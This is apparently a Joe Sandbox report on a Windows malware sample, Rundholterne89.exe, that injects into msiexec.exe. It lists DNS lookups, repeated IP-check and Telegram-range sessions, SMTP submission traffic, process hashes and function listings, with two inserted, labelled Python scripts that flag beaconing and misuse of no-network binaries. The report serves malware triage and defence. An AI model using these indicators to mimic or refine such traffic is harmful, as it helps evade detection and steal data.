Oct 22, 2024 16:04:14.224435091 CEST | 54912 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:14.232245922 CEST | 53 | 54912 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:18.449758053 CEST | 62130 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:18.457161903 CEST | 53 | 62130 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:19.574568987 CEST | 59112 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:19.799618959 CEST | 53 | 59112 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:31.822679996 CEST | 63612 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:31.829875946 CEST | 53 | 63612 | 1.1.1.1 | 192.168.2.10 |
Oct 22, 2024 16:04:39.026559114 CEST | 56678 | 53 | 192.168.2.10 | 1.1.1.1 |
Oct 22, 2024 16:04:39.036209106 CEST | 53 | 56678 | 1.1.1.1 | 192.168.2.10 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Oct 22, 2024 16:04:12.889697075 CEST | 192.168.2.10 | 1.1.1.1 | 0x5342 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:14.224435091 CEST | 192.168.2.10 | 1.1.1.1 | 0xf1a3 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.449758053 CEST | 192.168.2.10 | 1.1.1.1 | 0xdf59 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:19.574568987 CEST | 192.168.2.10 | 1.1.1.1 | 0xe66d | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:31.822679996 CEST | 192.168.2.10 | 1.1.1.1 | 0x5711 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:39.026559114 CEST | 192.168.2.10 | 1.1.1.1 | 0xb038 | Standard query (0) | | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Oct 22, 2024 16:04:12.898243904 CEST | 1.1.1.1 | 192.168.2.10 | 0x5342 | No error (0) | | | 142.250.185.174 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:14.232245922 CEST | 1.1.1.1 | 192.168.2.10 | 0xf1a3 | No error (0) | | | 142.250.186.65 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | | 193.122.130.0 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | | 132.226.247.73 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | | 158.101.44.242 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | | 132.226.8.169 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:18.457161903 CEST | 1.1.1.1 | 192.168.2.10 | 0xdf59 | No error (0) | | | 193.122.6.168 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | | | 188.114.97.3 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:19.799618959 CEST | 1.1.1.1 | 192.168.2.10 | 0xe66d | No error (0) | | | 188.114.96.3 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:31.829875946 CEST | 1.1.1.1 | 192.168.2.10 | 0x5711 | No error (0) | | | 149.154.167.220 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | | | 213.165.67.118 | A (IP address) | IN (0x0001) | false |
Oct 22, 2024 16:04:39.036209106 CEST | 1.1.1.1 | 192.168.2.10 | 0xb038 | No error (0) | | | 213.165.67.102 | A (IP address) | IN (0x0001) | false |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:18.466597080 CEST | 151 | OUT | |
Oct 22, 2024 16:04:19.138335943 CEST | 323 | IN | |
Oct 22, 2024 16:04:19.142839909 CEST | 127 | OUT | |
Oct 22, 2024 16:04:19.301644087 CEST | 323 | IN | |
Oct 22, 2024 16:04:20.598944902 CEST | 127 | OUT | |
Oct 22, 2024 16:04:20.758388996 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.10 | 49714 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:21.530924082 CEST | 127 | OUT | |
Oct 22, 2024 16:04:22.201797009 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.10 | 49716 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:22.965133905 CEST | 151 | OUT | |
Oct 22, 2024 16:04:23.627620935 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.10 | 49718 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:24.393897057 CEST | 151 | OUT | |
Oct 22, 2024 16:04:25.238945007 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.10 | 49720 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:26.039328098 CEST | 151 | OUT | |
Oct 22, 2024 16:04:26.703584909 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.10 | 49722 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:27.475423098 CEST | 151 | OUT | |
Oct 22, 2024 16:04:28.137046099 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.10 | 49724 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:28.916474104 CEST | 151 | OUT | |
Oct 22, 2024 16:04:29.574677944 CEST | 323 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.10 | 49726 | 193.122.130.0 | 80 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
Oct 22, 2024 16:04:30.325721025 CEST | 151 | OUT | |
Oct 22, 2024 16:04:30.988492966 CEST | 323 | IN |
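The eight HTTP sessions above all have the same shape: one request of 127 or 151 bytes from msiexec.exe to 193.122.130.0:80 (the address the DNS answers above resolve through the checkip.dyndns.com CNAME), one 323-byte reply, and a fresh connection roughly every 1.4 seconds. As an added example that is not part of the Joe Sandbox report or its tooling, the following Python script measures that cadence from a constructed inline subset of the session rows (session id, source port, first OUT timestamp, OUT and IN byte counts copied from the tables) and applies a simple beacon heuristic. The thresholds in `is_beacon` are assumptions of the example, not values taken from the report.

```python
"""Beacon-regularity check over the HTTP session rows of this report.

Added example, not sandbox tooling. HTTP_SESSIONS is a constructed subset of
the report's rows: session id, source port, first OUT timestamp, OUT bytes,
IN bytes. Thresholds in is_beacon() are assumptions for illustration.
"""
from datetime import datetime
from statistics import mean, pstdev

HTTP_SESSIONS = """\
0 | 49711 | Oct 22, 2024 16:04:18.466597080 CEST | 151 | 323
1 | 49714 | Oct 22, 2024 16:04:21.530924082 CEST | 127 | 323
2 | 49716 | Oct 22, 2024 16:04:22.965133905 CEST | 151 | 323
3 | 49718 | Oct 22, 2024 16:04:24.393897057 CEST | 151 | 323
4 | 49720 | Oct 22, 2024 16:04:26.039328098 CEST | 151 | 323
5 | 49722 | Oct 22, 2024 16:04:27.475423098 CEST | 151 | 323
6 | 49724 | Oct 22, 2024 16:04:28.916474104 CEST | 151 | 323
7 | 49726 | Oct 22, 2024 16:04:30.325721025 CEST | 151 | 323
"""


def parse_ts(text):
    """Parse a report timestamp such as 'Oct 22, 2024 16:04:18.466597080 CEST'.

    The report carries nanoseconds and a zone label; strptime handles only
    microseconds, so the fraction is truncated and the zone dropped (all rows
    share one zone, so relative gaps are unaffected).
    """
    core, _zone = text.rsplit(" ", 1)
    date, clock = core.rsplit(" ", 1)
    hms, frac = clock.split(".")
    return datetime.strptime(f"{date} {hms}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")


def beacon_profile(table):
    """Summarise cadence and payload sizes across the sessions in `table`."""
    rows = [[c.strip() for c in line.split("|")]
            for line in table.splitlines() if line.strip()]
    times = sorted(parse_ts(r[2]) for r in rows)
    gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
    return {
        "sessions": len(rows),
        "mean_gap_s": round(mean(gaps), 2),
        "gap_jitter_s": round(pstdev(gaps), 2),   # population std-dev of the gaps
        "request_sizes": sorted({int(r[3]) for r in rows}),
        "response_sizes": sorted({int(r[4]) for r in rows}),
    }


def is_beacon(profile, min_sessions=5, max_jitter_s=1.0, max_response_sizes=1):
    """Heuristic: many short sessions, steady cadence, constant reply size.

    A human-driven client neither reconnects on a fixed timer nor receives
    byte-identical responses; an IP-check or polling loop does both.
    """
    return (profile["sessions"] >= min_sessions
            and profile["gap_jitter_s"] <= max_jitter_s
            and len(profile["response_sizes"]) <= max_response_sizes)


if __name__ == "__main__":
    p = beacon_profile(HTTP_SESSIONS)
    print(p, "beacon-like" if is_beacon(p) else "irregular")
```

The first gap (about 3 s) is longer than the rest because session 0 carried three request/response pairs on one connection before the client switched to one request per connection; the population standard deviation still stays well under a second, which is what the heuristic keys on.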
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.10 | 49709 | 142.250.185.174 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:13 UTC | 216 | OUT | |
2024-10-22 14:04:14 UTC | 1610 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.10 | 49710 | 142.250.186.65 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:15 UTC | 258 | OUT | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 4890 | IN | |
2024-10-22 14:04:17 UTC | 27 | IN | |
2024-10-22 14:04:17 UTC | 1325 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN | |
2024-10-22 14:04:17 UTC | 1378 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:20 UTC | 87 | OUT | |
2024-10-22 14:04:20 UTC | 896 | IN | |
2024-10-22 14:04:20 UTC | 366 | IN | |
2024-10-22 14:04:20 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.10 | 49713 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:21 UTC | 63 | OUT | |
2024-10-22 14:04:21 UTC | 896 | IN | |
2024-10-22 14:04:21 UTC | 366 | IN | |
2024-10-22 14:04:21 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.10 | 49715 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:22 UTC | 63 | OUT | |
2024-10-22 14:04:22 UTC | 896 | IN | |
2024-10-22 14:04:22 UTC | 366 | IN | |
2024-10-22 14:04:22 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.10 | 49717 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:24 UTC | 87 | OUT | |
2024-10-22 14:04:24 UTC | 890 | IN | |
2024-10-22 14:04:24 UTC | 366 | IN | |
2024-10-22 14:04:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.10 | 49719 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:25 UTC | 63 | OUT | |
2024-10-22 14:04:26 UTC | 900 | IN | |
2024-10-22 14:04:26 UTC | 366 | IN | |
2024-10-22 14:04:26 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.10 | 49721 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:27 UTC | 87 | OUT | |
2024-10-22 14:04:27 UTC | 894 | IN | |
2024-10-22 14:04:27 UTC | 366 | IN | |
2024-10-22 14:04:27 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.10 | 49723 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:28 UTC | 63 | OUT | |
2024-10-22 14:04:28 UTC | 891 | IN | |
2024-10-22 14:04:28 UTC | 366 | IN | |
2024-10-22 14:04:28 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.10 | 49725 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:30 UTC | 87 | OUT | |
2024-10-22 14:04:30 UTC | 898 | IN | |
2024-10-22 14:04:30 UTC | 366 | IN | |
2024-10-22 14:04:30 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.10 | 49727 | 188.114.97.3 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:31 UTC | 63 | OUT | |
2024-10-22 14:04:31 UTC | 892 | IN | |
2024-10-22 14:04:31 UTC | 366 | IN | |
2024-10-22 14:04:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.10 | 49728 | 149.154.167.220 | 443 | 6624 | C:\Windows\SysWOW64\msiexec.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-10-22 14:04:32 UTC | 349 | OUT | |
2024-10-22 14:04:32 UTC | 344 | IN | |
2024-10-22 14:04:32 UTC | 55 | IN |
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands |
---|---|---|---|---|---|
Oct 22, 2024 16:04:39.782625914 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 220 kundenserver.de (mreue107) Nemesis ESMTP Service ready |
Oct 22, 2024 16:04:39.787214994 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 | EHLO 472847 |
Oct 22, 2024 16:04:40.036479950 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 250-kundenserver.de Hello 472847 [173.254.250.76] 250-8BITMIME 250-SIZE 141557760 250 STARTTLS |
Oct 22, 2024 16:04:40.036618948 CEST | 49729 | 587 | 192.168.2.10 | 213.165.67.118 | STARTTLS |
Oct 22, 2024 16:04:40.291269064 CEST | 587 | 49729 | 213.165.67.118 | 192.168.2.10 | 220 OK |
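The DNS answers, the per-process session headers and the SMTP command table above are the raw evidence a responder correlates first: the report drops the queried DNS names, so the checkip.dyndns.com CNAME is the only hostname left for 193.122.130.0; every HTTP and HTTPS session is attributed to msiexec.exe (PID 6624), a Windows Installer host that has no reason to talk to the internet; and the port-587 session (for which the report shows no owning process) reaches EHLO and STARTTLS, after which the capture is opaque. As an added example that is not part of the Joe Sandbox report or its tooling, the following Python script re-parses a constructed inline subset of those rows and produces that correlation. The list of "no-network" binaries and the SMTP port set are assumptions of the example; 188.114.97.3 and 149.154.167.220 are reported by IP because the page shows no hostname for them.

```python
"""Triage of this report's DNS, session and SMTP tables.

Added example, not Joe Sandbox code. The three tables are constructed inline
subsets of rows copied from the report; the policy list, port set and
findings logic are assumptions for illustration.
"""

# DNS answer rows: transaction ID, record type, value. The report drops the
# queried name, so a CNAME target is the only hostname that survives.
DNS_ANSWERS = """\
0xdf59 | CNAME (Canonical name) | checkip.dyndns.com
0xdf59 | A (IP address) | 193.122.130.0
0xe66d | A (IP address) | 188.114.97.3
0x5711 | A (IP address) | 149.154.167.220
0xb038 | A (IP address) | 213.165.67.118
"""

# Session headers: id, source IP, source port, destination IP, port, PID, image.
SESSIONS = """\
0 | 192.168.2.10 | 49711 | 193.122.130.0 | 80 | 6624 | C:\\Windows\\SysWOW64\\msiexec.exe
2 | 192.168.2.10 | 49712 | 188.114.97.3 | 443 | 6624 | C:\\Windows\\SysWOW64\\msiexec.exe
11 | 192.168.2.10 | 49728 | 149.154.167.220 | 443 | 6624 | C:\\Windows\\SysWOW64\\msiexec.exe
"""

# SMTP command rows: source port, destination port, command or reply text.
SMTP_COMMANDS = """\
587 | 49729 | 220 kundenserver.de (mreue107) Nemesis ESMTP Service ready
49729 | 587 | EHLO 472847
587 | 49729 | 250-kundenserver.de Hello 472847 [173.254.250.76] 250-8BITMIME 250-SIZE 141557760 250 STARTTLS
49729 | 587 | STARTTLS
587 | 49729 | 220 OK
"""

# Assumed policy list: Windows binaries that have no reason to open outbound
# TCP sessions on a workstation; a hit means injection until proven otherwise.
LOLBIN_NO_NETWORK = {"msiexec.exe", "regsvcs.exe", "regasm.exe", "installutil.exe"}
SMTP_PORTS = {25, 465, 587, 2525}   # assumed: submission/relay ports worth flagging


def parse_rows(table):
    """Split pipe-delimited report rows into lists of stripped cells."""
    return [[c.strip() for c in line.split("|")]
            for line in table.splitlines() if line.strip()]


def dns_labels(answers):
    """Map each answered IP to the CNAME target sharing its transaction ID."""
    cname_by_txid = {txid: value for txid, rtype, value in parse_rows(answers)
                     if rtype.startswith("CNAME")}
    return {value: cname_by_txid.get(txid, value)
            for txid, rtype, value in parse_rows(answers) if rtype.startswith("A ")}


def session_findings(sessions, labels):
    """Flag sessions owned by no-network LOLBins and name their destination."""
    findings = []
    for sid, _src, _sport, dst, dport, pid, image in parse_rows(sessions):
        exe = image.rsplit("\\", 1)[-1].lower()
        if exe in LOLBIN_NO_NETWORK:
            findings.append(f"session {sid}: {exe} (PID {pid}) -> {labels.get(dst, dst)}:{dport}")
    return findings


def smtp_summary(commands):
    """Reduce the SMTP exchange to the facts that matter for exfil triage."""
    state = {"server": None, "ehlo": None, "starttls_offered": False,
             "starttls_sent": False, "starttls_ok": False}
    for sport, _dport, text in parse_rows(commands):
        from_server = int(sport) in SMTP_PORTS
        if from_server and text.startswith("220 ") and state["server"] is None:
            state["server"] = text.split()[1]          # greeting banner hostname
        elif not from_server and text.upper().startswith("EHLO "):
            state["ehlo"] = text.split(None, 1)[1]     # client-chosen EHLO name
        elif from_server and text.startswith("250") and "STARTTLS" in text:
            state["starttls_offered"] = True
        elif not from_server and text.upper() == "STARTTLS":
            state["starttls_sent"] = True
        elif from_server and state["starttls_sent"] and text.startswith("220"):
            state["starttls_ok"] = True                # everything after is TLS
    return state


def triage():
    """Combine the three views into the findings a responder reads first."""
    labels = dns_labels(DNS_ANSWERS)
    findings = session_findings(SESSIONS, labels)
    smtp = smtp_summary(SMTP_COMMANDS)
    if smtp["starttls_ok"]:
        findings.append(f"SMTP submission to {smtp['server']}: EHLO {smtp['ehlo']}, "
                        "STARTTLS accepted, so body and credentials are not in the capture")
    return findings


if __name__ == "__main__":
    print("\n".join(triage()))
```

The EHLO argument (472847) is a bare number rather than a hostname, which is itself a usable detection feature: legitimate mail clients send an FQDN or an address literal. Because the session is encrypted from the 220 OK onward, the credentials and message body have to come from the unpacked sample's configuration rather than from the packet capture.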
Target ID: | 0 |
Start time: | 10:03:11 |
Start date: | 22/10/2024 |
Path: | C:\Users\user\Desktop\Rundholterne89.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x400000 |
File size: | 891'148 bytes |
MD5 hash: | A1E239C4D5116E289CE0597A92844EDE |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 2 |
Start time: | 10:03:14 |
Start date: | 22/10/2024 |
Path: | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x6b0000 |
File size: | 433'152 bytes |
MD5 hash: | C32CA4ACFCC635EC1EA6ED8A34DF5FAC |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | high |
Has exited: | true |
Target ID: | 3 |
Start time: | 10:03:14 |
Start date: | 22/10/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff620390000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 6 |
Start time: | 10:04:02 |
Start date: | 22/10/2024 |
Path: | C:\Windows\SysWOW64\msiexec.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0xcc0000 |
File size: | 59'904 bytes |
MD5 hash: | 9D09DC1EDA745A5F87553048E57620CF |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
Reputation: | high |
Has exited: | false |
Execution Graph
Execution Coverage: | 25.1% |
Dynamic/Decrypted Code Coverage: | 0% |
Signature Coverage: | 23.4% |
Total number of Nodes: | 1199 |
Total number of Limit Nodes: | 40 |
Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357, Tags: string, com, file, COMMON
Function 004048C5 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481, Tags: window, memory, COMMON
Function 00405D51 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 199, Tags: string, COMMON
Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159filestringCOMMON
Control-flow Graph
APIs |
|
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00406033 Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403A41 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004036AF Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401751 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
Control-flow Graph
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040605A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
Strings |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
Control-flow Graph
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Control-flow Graph
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00404EBC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004054C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
APIs |
Strings |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401A03 Relevance: 3.0, APIs: 2, Instructions: 30stringCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 004059A2 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040597D Relevance: 3.0, APIs: 2, Instructions: 13COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 0040548B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
APIs |
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A49 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00405A1A Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00401595 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403F60 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00403F49 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
APIs |
|
Memory Dump Source |
|
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
